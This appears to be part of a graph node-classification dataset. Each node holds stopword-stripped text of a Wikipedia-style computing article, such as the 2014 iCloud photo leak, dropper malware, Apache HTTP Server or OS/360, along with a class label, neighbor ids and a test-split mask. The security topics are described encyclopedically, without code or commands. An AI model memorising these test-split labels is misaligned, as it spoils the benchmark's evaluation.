    "text": "ICloud_leaks_of_celebrity_photos:icloud leaks celebrity photos august 31 2014 collection almost 500 private pictures various celebrities mostly women many containing nudity posted imageboard 4chan later disseminated users websites social networks imgur reddit images initially believed obtained via breach apple cloud services suite icloud security issue icloud api allowed make unlimited attempts guessing victims passwords however access later revealed gained via spear phishing attacks event media outlets internet users referred names fappening portmanteau words fap —a slang term masturbation—and film happening celebgate met varied reaction media fellow celebrities critics felt distribution images major invasion privacy subjects allegedly depicted subjects questioned authenticity leak also prompted increased concern analysts surrounding privacy security cloud computing services icloud—with particular emphasis use store sensitive private information images obtained via online storage offered apple icloud platform automatically backing photos ios devices iphones apple later reported victims icloud account information obtained using targeted attack user names passwords security questions phishing brute-force guessing initially believed images obtained using exploit find iphone service court documents 2014 indicated one user created fake email account called appleprivacysecurity ask celebrities security information photos passed around privately least couple weeks public release august 31 claims unreleased photos videos exist daily mail cited anonymous posters 4chan deadspin stated ring hackers traders sellers operating months leading mass release hacker responsible leak described collector distributed leaked images image boards 4chan anon-ib exchange bitcoin ultimately images widely circulated online via channels including imgur tumblr celebrity gossip blogger perez hilton also re-posted photos blog soon took issued apology saying acted bad taste major center activity link-sharing website reddit subreddit created sharing photos single day amassed 100,000 followers reddit administrators criticized allowing take place alleged violation anti-doxing rules mckayla maroney claimed 18 time photos taken reddit staff took photos warned anyone re-posting underage photos liz lee circulating prior incident would permanently banned site could prosecuted distributing child pornography september 7 citing copyright issues reddit banned thefappening subreddit also saying workload dealing become much reddit banned another subreddit named fappening day original release contained photos videos 100 individuals allegedly obtained file storage hacked icloud accounts including leakers claimed a-list celebrities shortly photos leaked several affected celebrities issued statements either confirm deny photos authenticity celebrities confirmed photos authenticity include jennifer lawrence confirmed publicist kate upton husband justin verlander confirmed upton lawyer mary elizabeth winstead confirmed twitter jessica brown findlay confirmed spokesman kaley cuoco confirmed via instagram kirsten dunst also criticized icloud service jill scott confirmed twitter one leaked photos stating another fake celebrities denied photos authenticity include ariana grande yvonne strahovski olympic gymnast mckayla maroney initially denied images authenticity twitter later confirmed photos legitimate also stating underage time taken victoria justice denied photos authentic later stated twitter pursuing legal actions found leak massive invasion privacy privacy celebrities affected leak reports october indicated nick hogan first male star directly targeted hackers however hogan denied pictures authenticity according security expert nik cubrilovic addition photographs personal information text messages calendars address books phone call logs data stored phones backed service also likely stolen september 20 2014 second batch similar private photos additional celebrities leaked hackers september 26 2014 third batch also leaked dubbed fappening 3 actress lena dunham pleaded twitter people view pictures saying violat es women okay actress emma watson condemned release photos also accompanying comments social media show lack empathy actors seth rogen lucas neff also spoke hackers people posted pictures justin verlander pitcher detroit tigers told media prior game cleveland indians keeps private life private would rather focus tigers race kansas city royals al central title distraction teammates security analysts stated breach could prevented use two-factor authentication forbes writer recommended turning icloud photo stream feature uploads photos taken ios device icloud servers automatically entirely incident given many names including fappening portmanteau happening fap internet slang term masturbation celebgate reference watergate scandal term fappening received criticism journalists like radhika sanghani daily telegraph toyin owoseje international business times said term trivialized leak also according sanghani made light severe situation articles used term extensively describe event including headlines interview wall street journal apple ceo tim cook stated response leaks company planned take additional steps protect privacy security icloud users future notifications provided whenever data restored device via icloud logging icloud via web browser addition existing notifications user icloud password changed additionally apple broaden encourage use two-factor authentication future versions software operating systems then-upcoming ios 8 conclusion emphasized want everything protect customers outraged jennifer lawrence contacted authorities publicist stated authorities prosecute anyone posts leaked images forbes columnist joseph steinberg questioned whether reactions law enforcement technology providers indicated celebrities treated differently ordinary americans case law enforcement may illegal october 1 2014 google threatened lawsuit lawyer martin singer 100 million behalf unnamed victims leaks alleging google refused respond requests images removed platforms including blogger youtube failing act expeditiously responsibly remove images knowingly accommodating facilitating perpetuating unlawful conduct interview vanity fair lawrence called leak sex crime sexual violation added anybody looked pictures 're perpetuating sexual offense cower shame view contrasted another victim hack emily ratajkowski told gq lot people victims hack said anyone looks pictures feel guilty n't think fair 'm sure anyone googles necessarily criminal think people stole photos fbi said aware allegations concerning computer intrusions unlawful release material involving high profile individuals addressing matter similarly apple stated investigating whether security breach icloud service responsible leaked photographs per company commitment user privacy september 2 2014 apple reported leaked images result compromised accounts using targeted attack user names passwords security questions practice become common internet october 2014 fbi searched house chicago seized several computers cell phones storage drives tracking source hacking attack ip address linked individual named emilio herrera related search warrant application mentioned eight victims initials a.s. c.h. h.s. j.m. o.w. a.k. e.b. a.h. supposedly point stolen photos abigail spencer christina hendricks hope solo jennette mccurdy olivia wilde anna kendrick emily browning amber heard according law enforcement officials herrera one several people investigation fbi carried various searches across country march 2016 36-year-old ryan collins lancaster pennsylvania agreed plead guilty one count unauthorized access protected computer obtain information resulting 18-month sentence victims named court documents numerous media outlets connected collins case fappening investigation found collins phished sending e-mails victims looked like came apple google warning victims accounts might compromised asking account details victims would enter passwords collins gained access accounts downloading e-mails icloud backups october 2016 collins sentenced 18 months prison august 2016 28-year-old edward majerczyk chicago illinois agreed plead guilty similar phishing scheme although authorities believe worked independently accused selling images posting online january 24 2017 majerczyk sentenced nine months prison ordered pay 5,700 restitution cover counseling services one unnamed celebrity victim emilio herrera also chicago first named press 2014 pleaded guilty one count unauthorized access protected computer obtain information october 2017 herrera accessed accounts unnamed celebrities others accused involved leaking sharing photos videos obtained sentenced 16 months jail march 2018 april 2018 26-year-old george garofano north branford connecticut pleaded guilty one count unauthorized access protected computer obtain information garofano attorney said led phishing scheme criminals august 29 2018 federal court sentenced garofano eight months prison october 22 2018 christopher brannan former virginia teacher became fifth man convicted relation hacking brannan pled guilty federal charges aggravated identity theft unauthorized access protected computer phishing expedition hacked 200 people addition celebrity victims brannan targeted underage sister-in-law well teachers students school used teach brannan sentenced 34 months prison march 1 2019",
    "neighbors": [
      1024,
      5636,
      9732,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1087,
      1608,
      3657,
      8779,
      4703,
      8288,
      4194,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      8446,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      9550,
      6484,
      1882,
      7515,
      3956,
      9082,
      6023,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      11244,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 858,
    "label": 4,
    "text": "Dropper_(malware):dropper malware dropper kind trojan designed install sort malware virus backdoor etc target system malware code contained within dropper single-stage way avoid detection virus scanners dropper may download malware target machine activated two stage",
    "neighbors": [
      3555,
      10756,
      2213,
      9832,
      107,
      6059,
      7515,
      7739,
      3867,
      1662
    ],
    "mask": "Test"
  },
  {
    "node_id": 859,
    "label": 3,
    "text": "Sony_Toshiba_IBM_Center_of_Competence_for_the_Cell_Processor:sony toshiba ibm center competence cell processor sony toshiba ibm center competence cell processor first center competence dedicated promotion development sony toshiba ibm cell microprocessor eight-core multiprocessor designed using principles parallelism memory latency center part georgia institute technology college computing headed david a. bader according ibm center intended build community programmers broaden industry support cell processor far program resulted two workshops involved detailed lectures training various basic cell programming concepts deployed cluster 28 ibm bladecenter qs20 servers 14 blades student faculty use",
    "neighbors": [
      9472,
      10368,
      643,
      9091,
      3077,
      10761,
      11657,
      5006,
      6799,
      1784,
      9508,
      9126,
      6311,
      9512,
      684,
      306,
      1587,
      7218,
      9397,
      6072,
      8120,
      10040,
      1985,
      10749,
      1091,
      9543,
      6909,
      5450,
      6732,
      10316,
      3025,
      6738,
      342,
      8792,
      6873,
      1115,
      4060,
      3677,
      607,
      9445,
      359,
      8937,
      10985,
      4587,
      9455,
      3824,
      8316,
      5746,
      6004,
      2293,
      7028,
      3960,
      7801,
      3323,
      6268,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 860,
    "label": 1,
    "text": "Database_caching:database caching database caching process included design computer applications generate web pages on-demand dynamically accessing backend databases applications deployed multi-tier environments involve browser-based clients web application servers backend databases middle-tier database caching used achieve high scalability performance three tier architecture application software tier data storage tier different hosts throughput application limited network speed limitation minimized database application tier commercial database software makes extensive use system resources always practical application database host case light-weight database application used cache data commercial database management system database caching improves scalability distributing query workload backend multiple cheap front-end systems allows flexibility processing data example data platinum customers cached ordinary customers caching improve availability data providing continued service applications depend cached tables even backend server unavailable another benefit improved data access speeds brought locality data smoothing load peaks avoiding round-trips middle-tier data-tier",
    "neighbors": [
      2688,
      1801,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      2339,
      7461,
      8742,
      8871,
      5550,
      5808,
      10418,
      7347,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      10565,
      8518,
      72,
      10700,
      853,
      2901,
      9942,
      9177,
      987,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 861,
    "label": 3,
    "text": "Cosmic_Soldier_(video_game):cosmic soldier video game game introduced dialog conversation system player recruit allies speaking choose whether kill spare enemy engage enemies conversation similar later famous megami tensei battles fought turn-based style game also displayed nudity title screen 1987 sequel cosmic soldier psychic war released msx2 computer japan ms-dos platform west changed turn-based combat predecessor unique tug war style real-time combat system battles clash energy party enemy player needing push energy towards enemy strike able use shield block suction ability absorb opponent power game also improves upon conversation system predecessor closely resembles one megami tensei released around time",
    "neighbors": [
      10931,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 862,
    "label": 7,
    "text": "Gemstone_(database):gemstone database gemstone/s computer software application framework first available programming language smalltalk object database proprietary commercial software gemstone systems founded march 1 1982 servio logic build database machine based set theory model ian huang instigated founding technology adviser ceo sampoerna holdings putera sampoerna recruiting frank bouton president cofounder floating point systems inc dr. michael mulder vice president engineering group manager advanced processor design sperry univac principal architect univac 1180 mainframe steve ivy vice president operation senior manager tektronix leonard yuen vice president business development development manager ibm db2 database dr. george copeland chief architect senior staff engineer advanced development group tektronix steve redfield chief engineer chief engineer intel 80286 microprocessor alan purdy staff engineer tektronix bob bretl software engineering manager tektronix signal processing systems allen otis also tektronix john telford software engineering manager electro scientific industries monty williams servio logic renamed gemstone systems inc. june 1995 firm developed first hardware prototype 1982 shipped first software product gemstone 1.0 1986 engineering group resides beaverton oregon three original cofounding engineers bob bretl allen otis monty williams retired firm since start gemstone owners pioneered implementing distributed computing business systems many information system features associated java ee implemented earlier gemstone gemstone visualwave early web application server platform visualwave visualworks owned cincom gemstone played important sponsorship role smalltalk industry council time ibm backing visualage smalltalk owned instantiations inc. major transition gemstone smalltalk continued gemstone/s various c++ java products scalable multitier architecture distributed computing systems evolved gemstone/j product turn gave rise gemfire early example data fabric complex event processing cep event stream processing esp data virtualization distributed caching may 6 2010 springsource division vmware announced entered definitive agreement acquire gemstone may 2 2013 gemtalk systems acquired gemstone/s platform pivotal software emc vmware spin-off .. gemfire remained pivotal big data division product available standalone also integrated cloud foundry paas pivotal cloud cache gemstone builds programming language smalltalk gemstone systems serve mission-critical applications gemstone frameworks still see interest web services service-oriented architectures recent revival interest smalltalk occurred result use generate javascript e-commerce web pages web application frameworks seaside web framework systems based object databases common based orm object-relational mapping frameworks toplink hibernate application framework market jboss bea weblogic somewhat analogous gemstone",
    "neighbors": [
      9345,
      5380,
      3462,
      7175,
      6153,
      8201,
      4107,
      5518,
      9467,
      3219,
      9245,
      5409,
      10020,
      5677,
      7983,
      823,
      4811,
      6860,
      2901,
      1112,
      1382,
      11625,
      9323,
      5356,
      5612,
      3323,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 863,
    "label": 2,
    "text": "Linux_on_z_Systems:linux z systems linux ibm z linux z short previously linux z systems collective term linux operating system compiled run ibm mainframes especially ibm z ibm linuxone servers similar terms imply meaning linux zenterprise linux zseries linux/390 linux/390x etc terms zlinux z/linux also sometimes used terms discouraged ibm create implication ibm-offered ibm-distributed version linux incorrect zlinux without slash also incorrect software software nomenclature involves slash z/vm z/os z/vse etc hardware z900 z13 etc linux ibm z originated two separate efforts port linux ibm system/390 servers first effort bigfoot project developed linas vepstas late 1998 early 1999 independent distribution since abandoned ibm published collection patches additions linux 2.2.13 kernel december 18 1999 start today mainline linux z formal product announcements quickly followed 2000 including integrated facility linux ifl engines think blue linux early mainframe distribution consisting mainly red hat packages added ibm kernel commercial linux distributors introduced mainframe editions quickly initial kernel work start ibm involvement linux patches ibm z included object code oco modules without source code soon ibm replaced oco modules open source modules linux z free software gnu general public license according ibm may 2006 1,700 customers running linux mainframes virtualization required default ibm z option run linux z without degree virtualization first 64-bit mainframe models z900 z800 included non-virtualized basic mode first layer virtualization provided processor resource system manager pr/sm deploy one logical partitions lpars lpar supports variety operating systems including linux ibm z hypervisor called z/vm also run second layer virtualization lpars create many virtual machines vms resources assigned lpars support kvm z another hypervisor option linux applications lpar access data applications lpars cics ibm db2 ims linux mainframe subsystems running physical mainframe utilize hipersockets – fast memory-only tcp/ip connections compared tcp/ip standard network interface cards nics also known open system adapters osas mainframes hipersockets improve end-user responsiveness reduce network latency processing overhead security since network connection intercept reliability since network connection lose zec12 zbc12 later models hipersocket concept extended beyond physical machine boundary via rdma converged ethernet roce adapter facilitate secure high speed inter-system communication applications lpar system thus use hipersockets communicate applications lpar b system b ensure security performance attributes beginning linux kernel version 4.1 released early 2015 linux z available 64-bit operating system compatible z/architecture mainframes previously linux z also available 31-bit operating system compatible older model mainframes introduced prior 2000 z900 model however newer 64-bit linux kernel 64-bit linux z distributions still backward compatible applications compiled 31-bit linux z historically linux kernel architecture designations s390 s390x distinguish 31-bit 64-bit linux z kernels respectively s390 also refers generally one linux z kernel architecture linux runs standard general purpose mainframe cps central processors well ifls integrated facility linux ifls mainframe processors dedicated running linux either natively hypervisor z/vm kvm z microcode restricts ifls running traditional workloads z/os physically identical ibm z processors ifls typically less expensive acquire ibm cps linux z gives flexibility running linux advantages fault-tolerant mainframe hardware capable 90,000 i/o operations per second mean time failure mtbf measured decades using virtualization numerous smaller servers combined onto one mainframe gaining benefits centralization cost reduction still allowing specialized servers instead paravirtualization ibm mainframes use full virtualization permits workload density far greater paravirtualization combining full virtualization hardware plus lightweight virtual machine containers run linux isolation somewhat similar concept docker result platform supports virtual servers single footprint also lower operating costs additional savings seen reduced need floor space power cooling networking hardware infrastructure needed support data center ibm mainframes allow transparent use redundant processor execution steps integrity checking important critical applications certain industries banking.. mainframes typically allow hot-swapping hardware processors memory ibm z provides fault tolerance key components including processors memory i/o interconnect power supply channel paths network cards others internal monitoring possible problems detected problem components designed switched without even failing single transaction rare event failure firmware automatically enable spare component disable failing component notify ibm dispatch service representative transparent operating system allowing routine repairs performed without shutting system many industries continue rely mainframes considered best option terms reliability security cost linux z generally appropriate premises small businesses would fewer 10 distributed linux servers although expensive per-processor licensed software quickly reduce rule thumb software vendors including ibm treat highly virtualized ifls like non-virtualized processors platforms licensing purposes words single ifl running scores linux instances still typically counts one ordinary cpu cpu price software licensing test development quality assurance training redundant production server instances run one ifl ifls needed peak demand performance capacity thus beyond minimum threshold linux z quickly become cost-advantageous factoring labor software costs cost equation linux z always well understood controversial many businesses governments difficulty measuring much less basing decisions software labor costs costs outage security breaches acquisition costs often visible small non-scalable servers cheap nonetheless non-acquisition costs less real usually far greater hardware acquisition prices also individual users departments within larger businesses governments sometimes difficulty sharing computing infrastructure resources matter citing loss control server centralization linux z provides might reward cooperation better service lower costs say cooperation always easily accomplished within corporate bureaucracy linux z also supports less expensive disk storage devices z/os linux require ficon escon attachment although z/os may use disk space efficiently balance due hardware-assisted database compression common z/os smaller number operating system instances z/os typically requires also operational advantages using ficon-attached storage linux z example support z/vm live guest relocation mainframe characteristics designed business workloads transaction processing especially conjunction concurrent high volume batch processing large database management mainframe design traditionally emphasizes balanced performance computing elements including input/output implemented via channel i/o mainframes offload i/o system accounting non-core computing tasks main cpus much possible z/architecture additionally offloads cryptographic calculations example single ibm z13 machine 141 processor cores available configure ifls however every machine also 27 additional main cores 2 spares 1 firmware support remainder running system accounting i/o support tasks addition i/o adapter typically two powerpc processors z13 supports hundreds i/o adapters also separate processors handling memory cache control tasks environmental monitoring internal interconnections examples historically mainframes general linux z particular execute cpu-intensive single task computations notably high performance compared certain platforms notable exceptions cryptographic calculations examples included scientific simulations weather forecasting molecular modeling supercomputers including linux-based supercomputers excel workloads bifurcation mainframes platforms significantly blurred recent years starting introduction 2008 system z10 machine based quad-core 4.4 ghz processors hardware decimal floating point mainframe processor technology continued evolve especially introduction ibm linuxone ibm z13 models 2015 ibm started promoting mainframes ideal platforms run real-time analytics computationally intensive tasks mainframes historically run well ibm sold x86 server product line lenovo 2014 mainframes provide graphics sound adapters ill-suited digital media editing computer-aided design cad except perhaps support roles e.g content storage parts inventories metadata management security services etc like versions linux linux z governed gpl free software license complete linux z source code available numerous parties free equal basis architectural support part main linux kernel effort ibm assigns several programmers community effort ibm means participant though obstacles running linux z distribution ibm z system ibm routinely tests three particular linux z distributions red hat suse starting 2015 canonical ubuntu linux notable linux z distributions include debian fedora slackware centos gentoo nearly every free open-source software package available linux generally available linux z including apache http server samba software jboss postgresql mysql php python programming language concurrent versions system cvs gnu compiler collection gcc llvm perl rust among many others red hat suse offer mainline support distributions running linux z 2015 canonical announced plans offer official support distribution starting early 2016 ibm global services also offers support contracts including 24x7 coverage standard linux software applications readily available pre-compiled including popular closed-source enterprise software packages websphere db2 oracle databases applications sap r/3 sap erp ibm java developer kit jdk name ibm offers resources developers wishing target linux z linux z supports unicode ascii like linux distribution—it ebcdic-based operating system however convenience linux able read kernel parameters ebcdic z/vm takes advantage capability porting linux applications linux z fairly straightforward potential issues include endianness linux z big-endian reliance non-portable libraries particularly source code available programs easily cross compiled z/architecture binaries non-mainframe linux systems least three software-based ibm z mainframes emulators",
    "neighbors": [
      6148,
      7173,
      10780,
      10273,
      3618,
      5677,
      7217,
      10803,
      7733,
      573,
      10817,
      5220,
      9829,
      10340,
      6248,
      2168,
      5755,
      2172,
      2179,
      1668,
      7812,
      8326,
      10883,
      3720,
      9361,
      2195,
      10389,
      9370,
      1694,
      4255,
      7848,
      8879,
      6325,
      1219,
      6852,
      8388,
      710,
      6342,
      3791,
      1235,
      1761,
      4841,
      9455,
      8439,
      3323,
      9468,
      2813,
      5378,
      7938,
      4360,
      11024,
      789,
      1813,
      5397,
      3359,
      6442,
      1323,
      7983,
      7477,
      823,
      10040,
      3387,
      2877,
      5450,
      6483,
      7507,
      8539,
      2910,
      863,
      865,
      3938,
      868,
      3429,
      5480,
      8554,
      7022,
      3443,
      5492,
      375,
      8063,
      4996,
      8582,
      3978,
      4493,
      7053,
      8077,
      9619,
      11155,
      11673,
      6557,
      421,
      10149,
      4011,
      9646,
      9139,
      7607,
      5562,
      9660,
      964,
      8644,
      5067,
      8147,
      5603,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 864,
    "label": 1,
    "text": "Partial_index:partial index databases partial index also known filtered index index condition applied includes subset rows table allows index remain small even though table may rather large extreme selectivity suppose transaction table entries start status active may pass statuses p pending w worked reaching final status f point longer likely processed postgresql useful partial index might defined index would bother storing millions rows reached final status f would allow queries looking transactions still need work efficiently search via index similarly partial index used index rows column null benefit column usually null index would allow following query read updated tuples necessary condition index criterion stonebraker paper presents number examples indexes similar following sql server type index called filtered index partial indexes supported postgresql since version 7.2 released february 2002 sqlite supports partial indexes since version 3.8.0 mongodb supports partial indexes latest release v3.2 mysql version 8.0 support partial indexes mysql term partial index sometimes used refer prefix indexes truncated prefix value stored index another technique reducing index size",
    "neighbors": [
      5546,
      7022,
      10737,
      9075,
      10389,
      11030,
      2456,
      8539
    ],
    "mask": "Test"
  },
  {
    "node_id": 865,
    "label": 8,
    "text": "Apache_HTTP_Server:apache http server apache http server colloquially called apache free open-source cross-platform web server software released terms apache license 2.0 apache developed maintained open community developers auspices apache software foundation vast majority apache http server instances run linux distribution current versions also run microsoft windows wide variety unix-like systems past versions also ran openvms netware os/2 operating systems including ports mainframes originally based ncsa httpd server development apache began early 1995 work ncsa code stalled apache played key role initial growth world wide web quickly overtaking ncsa httpd dominant http server remained popular since april 1996 2009 became first web server software serve 100 million websites estimated serve 29 active websites ranked 2nd nginx 32 32 top million websites ranked 2nd 33 number explanations origin apache name offered years inception apache project 1995 official documentation stated april 2000 interview brian behlendorf one creators apache said since 2013 apache foundation explained origin name apache running unix process name httpd short http daemon apache supports variety features many implemented compiled modules extend core functionality range authentication schemes supporting server-side programming languages perl python tcl php popular authentication modules include mod_access mod_auth mod_digest mod_auth_digest successor mod_digest sample features include secure sockets layer transport layer security support mod_ssl proxy module mod_proxy url rewriting module mod_rewrite custom log files mod_log_config filtering support mod_include mod_ext_filter popular compression methods apache include external extension module mod_gzip implemented help reduction size weight web pages served http modsecurity open source intrusion detection prevention engine web applications apache logs analyzed web browser using free scripts awstats/w3perl visitors virtual hosting allows one apache installation serve many different websites example one computer one apache installation could simultaneously serve codice_1 codice_2 codice_3 etc apache features configurable error messages dbms-based authentication databases content negotiation supports several graphical user interfaces guis supports password authentication digital certificate authentication source code freely available anyone adapt server specific needs large public library apache add-ons detailed list features provided instead implementing single architecture apache provides variety multiprocessing modules mpms allow run either process-based mode hybrid process thread mode event-hybrid mode order better match demands particular infrastructure choice mpm configuration therefore important compromises performance must made apache designed reduce latency increase throughput relative simply handling requests thus ensuring consistent reliable processing requests within reasonable time-frames delivering static pages apache 2.2 series considered significantly slower nginx varnish address issue apache developers created event mpm mixes use several processes several threads per process asynchronous event-based loop architecture implemented apache 2.4 series performs least well event-based web servers according jim jagielski independent sources however independent significantly outdated benchmarks show still half fast nginx e.g apache http server codebase relicensed apache 2.0 license previous 1.1 license january 2004 apache http server 1.3.31 2.0.49 first releases using new license openbsd project like change continued use pre-2.0 apache versions effectively forking apache 1.3.x purposes initially replaced nginx soon made replacement openbsd httpd based relayd project version 1.1 apache license 1.1 approved asf 2000 primary change 1.0 license 'advertising clause section 3 1.0 license derived products longer required include attribution advertising materials documentation version 2.0 asf adopted apache license 2.0 january 2004 stated goals license included making license easier non-asf projects use improving compatibility gpl-based software allowing license included reference instead listed every file clarifying license contributions requiring patent license contributions necessarily infringe contributor patents apache http server project collaborative software development effort aimed creating robust commercial-grade feature-rich freely available source code implementation http web server project jointly managed group volunteers located around world using internet web communicate plan develop server related documentation project part apache software foundation addition hundreds users contributed ideas code documentation project apache 2.4 dropped support beos tpf even older platforms",
    "neighbors": [
      5641,
      2060,
      9229,
      7695,
      6161,
      5139,
      1556,
      7702,
      1047,
      8217,
      5660,
      10780,
      2596,
      1062,
      11303,
      8745,
      44,
      7212,
      10284,
      1583,
      10800,
      4658,
      6714,
      9789,
      7742,
      10815,
      64,
      7233,
      7750,
      4171,
      595,
      7252,
      8281,
      2138,
      4186,
      7261,
      8799,
      8294,
      7784,
      5738,
      8810,
      9834,
      3182,
      11376,
      9841,
      2163,
      10867,
      4725,
      6774,
      119,
      11386,
      5755,
      124,
      10883,
      7812,
      3717,
      4233,
      10377,
      6797,
      7318,
      8860,
      2717,
      8350,
      3746,
      11428,
      3237,
      8358,
      168,
      4777,
      7338,
      9387,
      11439,
      692,
      1206,
      3766,
      10939,
      4797,
      5314,
      6338,
      7364,
      1222,
      711,
      4294,
      6855,
      11466,
      3791,
      7378,
      5334,
      8408,
      5849,
      5339,
      1244,
      6366,
      225,
      1250,
      8419,
      4837,
      8425,
      234,
      747,
      6379,
      8941,
      2287,
      8434,
      8441,
      9981,
      7430,
      3848,
      1802,
      10506,
      3852,
      5900,
      4878,
      8460,
      1296,
      7443,
      5397,
      10520,
      1817,
      7962,
      8986,
      7457,
      8994,
      10530,
      10020,
      3877,
      10026,
      1837,
      1327,
      7983,
      9014,
      823,
      4919,
      5433,
      9527,
      1851,
      2364,
      7485,
      4927,
      2880,
      9538,
      4419,
      2372,
      4423,
      2377,
      3401,
      3404,
      3920,
      4944,
      1363,
      10579,
      1367,
      4439,
      5470,
      863,
      865,
      2404,
      358,
      11111,
      2409,
      5482,
      9580,
      7022,
      10611,
      8568,
      1913,
      889,
      3966,
      10622,
      1920,
      11134,
      1410,
      4485,
      4997,
      8582,
      908,
      10125,
      7567,
      9616,
      1937,
      11154,
      5012,
      11668,
      7575,
      11161,
      1946,
      6555,
      412,
      3487,
      1952,
      11167,
      11682,
      9125,
      7078,
      10661,
      11688,
      11693,
      9647,
      2485,
      5047,
      5048,
      7608,
      4538,
      6074,
      1468,
      4033,
      8644,
      1991,
      5066,
      8139,
      10186,
      4561,
      5074,
      2003,
      8147,
      5077,
      3545,
      5593,
      9179,
      990,
      479,
      10719,
      11235,
      5093,
      5612,
      8689,
      8691,
      7159,
      1018,
      2045,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 866,
    "label": 2,
    "text": "NetInfo:netinfo netinfo system configuration database nextstep mac os x versions mac os x v10.4 tiger netinfo replaces unix system configuration files though still present running machine single user mode unix apis wrap around netinfo instead netinfo stores system wide network-type configuration information users groups binary databases mac os x machine application specific settings stored plist files netinfo introduced nextstep version 0.9 replaced unix system configuration files sun microsystems network information service yellow pages next computers immediately caused controversy much unfavorable netinfo unique next computers although next later licensed netinfo xedoc australian software company produced netinfo unix systems dns queries went netinfo led situation basic tasks translating unix uid user name string would complete netinfo stalled dns lookup first possible disable netinfo use unix system files nextstep version 2 disabling netinfo also disabled dns support thus next computers became notorious locking user everyday tasks dns server stopped responding mac os x version netinfo remedied many problems due early problems netinfo never took world unix system configuration apple moved away using netinfo towards ldap particularly mac os x server mac os x v10.4 last version support netinfo beginning mac os x v10.5 netinfo completely phased replaced new local search node named dslocal files located /var/db/dslocal/ standard property list xml-based files netinfo database stored /private/var/db/netinfo/local.nidb/ accessed root viewed modified application programming interface netinfo manager utility command line tools niutil netinfo completely removed mac os x 10.5 netinfo-based command line tools also phased replaced tools also netinfo manager removed netinfo stores following data",
    "neighbors": [
      5985,
      9665,
      5093,
      168,
      5492,
      2901,
      6651,
      4571,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 867,
    "label": 0,
    "text": "Morphological_parsing:morphological parsing morphological parsing natural language processing process determining morphemes given word constructed must able distinguish orthographic rules morphological rules example word 'foxes decomposed 'fox stem 'es suffix indicating plurality generally accepted approach morphological parsing use finite state transducer fst inputs words outputs stem modifiers fst initially created algorithmic parsing word source dictionary complete modifier markups another approach use indexed lookup method uses constructed radix tree often-taken route breaks morphologically complex languages advancement neural networks natural language processing became less common use fst morphological analysis especially languages lot available training data languages possible build character-level language models without explicit use morphological parser orthographic rules general rules used breaking word stem modifiers example would singular english words ending -y pluralized end -ies contrast morphological rules contain corner cases general rules types rules used construct systems morphological parsing morphological rules exceptions orthographic rules used breaking word stem modifiers example would one normally pluralizes word english adding suffix word 'fish change pluralized contrast orthographic rules contain general rules types rules used construct systems morphological parsing applications morphological processing include machine translation spell checker information retrieval",
    "neighbors": [
      1890,
      7780,
      3998
    ],
    "mask": "None"
  },
  {
    "node_id": 868,
    "label": 2,
    "text": "OS/360_and_successors:os/360 successors os/360 officially known ibm system/360 operating system discontinued batch processing operating system developed ibm then-new system/360 mainframe computer announced 1964 heavily influenced earlier ibsys/ibjob input/output control system iocs packages one earliest operating systems require computer hardware include least one direct access storage device although os/360 discontinued successor operating systems including virtual storage mvs 64-bit z/os still run maintain application-level compatibility ibm announced three different levels os/360 generated tapes sharing code ibm eventually renamed options made significant design changes users often coined nicknames e.g. big os os/mft none names official recognition ibm major operating system system/360 hardware dos/360 os/360 public domain downloaded freely well run actual system/360 hardware executed free hercules emulator runs unix unix-like systems including gnu/linux solaris macos well windows os/360 turnkey cds provide pregenerated os/360 21.8 systems ready run hercules ibm originally intended system/360 one batch-oriented operating system os/360 capable running machines small 32 kib also intended supply separate timesharing operating system tss/360 system/360 model 67 least two accounts ibm eventually decided produce simpler batch-oriented operating systems ibm introduced series stop-gaps prevent system/360 hardware sales collapsing—first bos/360 basic operating system smallest machines 8k byte memories tos/360 tape operating system machines least 16k byte memories tape drives finally dos/360 disk operating system became mainstream operating system ancestor today widely used z/vse ibm released three variants os/360 pcp primary control program stop-gap could run one job time 1966 mft multiprogramming fixed number tasks mid-range machines mvt multiprogramming variable number tasks top end mft mvt used least 1981 decade successors launched division mft mvt arose storage limitations scheduling constraints initially ibm maintained mft mvt simply two configurations os/360 control program although later ibm described separate versions os/360 ibm originally wrote os/360 assembly language later ibm wrote os/360 code new language basic systems language bsl derived pl/i large amount tso code release 20 written bsl tss/360 late unreliable ibm canceled although ibm later supplied three releases tss/370 prpq time cp-67 running well enough ibm offer without warranty timesharing facility large customers three options offered similar facilities porting applications usually required minimal effort versions ibm program products application utility software ran text mostly treats pcp mft mvt simply new names original sss mss mps although design changes also text distinguish m65mp mvt officially pcp mft mvt separate operating systems os/360 install-time configuration options—in today words three different variants os nucleus scheduler however quite different behavior memory requirements users commonly consider de facto separate operating systems refer early os/360 os/mft os/mvt respectively mft differs mvt mainly way manages memory installing mft customers specify fixed number partitions areas memory fixed boundaries application programs run simultaneously primary control program pcp intended machines small memories similar mft one partition experience indicated advisable install os/360 systems less 128 kib memory although limited production use possible much smaller machines 48 kib memory ibm dropped pcp option final releases os/360 leaving mft ii mvt required memory also referred sys=min macro expansions system-dependent multiprogramming fixed number tasks mft intended serve stop-gap multiprogramming variable number tasks mvt intended target configuration os/360 became available 1967 early versions mvt many problems simpler mft continued used many years introducing new system/370 machines virtual memory 1972 ibm developed mft 2 os/vs1 last system particular line first version mft shared much code architecture pcp limited four partitions cumbersome run multiple partitions many installations used houston automatic spooling priority hasp mitigate complexity mft version ii mft-ii shared much control program scheduler code mvt much flexible 